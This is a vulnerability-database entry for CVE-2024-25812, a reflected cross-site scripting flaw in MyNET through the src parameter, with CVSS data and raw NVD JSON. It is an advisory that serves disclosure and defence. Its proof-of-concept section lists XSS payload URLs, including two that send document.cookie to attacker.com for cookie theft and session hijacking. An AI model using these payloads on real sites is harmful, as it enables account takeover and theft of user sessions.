Security Vulnerability Report
中文
CVE-2024-25812 CVSS 6.1 MEDIUM

CVE-2024-25812

Published: 2025-12-22 20:15:43
Last Modified: 2026-01-02 14:29:04

Description

MyNET up to v26.05 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the src parameter.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:airc:mynet:*:*:*:*:*:*:*:* - VULNERABLE
MyNET <= v26.05

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2024-25812 PoC - Reflected XSS via src parameter --> <!-- Example malicious URL --> <!-- https://target.com/path?src=%3Cscript%3Ealert(document.cookie)%3C/script%3E --> <!-- Basic XSS PoC --> https://vulnerable-site.com/index.php?src=<script>alert('XSS')</script> <!-- Cookie stealing PoC --> https://vulnerable-site.com/index.php?src=<script>fetch('https://attacker.com/log?c='+document.cookie)</script> <!-- Session hijacking PoC --> https://vulnerable-site.com/index.php?src=<script>document.location='https://attacker.com/steal?data='+btoa(document.cookie)</script> <!-- HTML injection + XSS --> https://vulnerable-site.com/index.php?src=<img src=x onerror="alert(document.domain)">

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-25812", "sourceIdentifier": "[email protected]", "published": "2025-12-22T20:15:43.383", "lastModified": "2026-01-02T14:29:04.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MyNET up to v26.05 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the src parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:airc:mynet:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.05", "matchCriteriaId": "672D0AF2-80F8-4ECC-87F4-5A3F204DBFF7"}]}]}], "references": [{"url": "https://github.com/am0nt31r0/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN", "source": "[email protected]", "tags": ["Product"]}]}}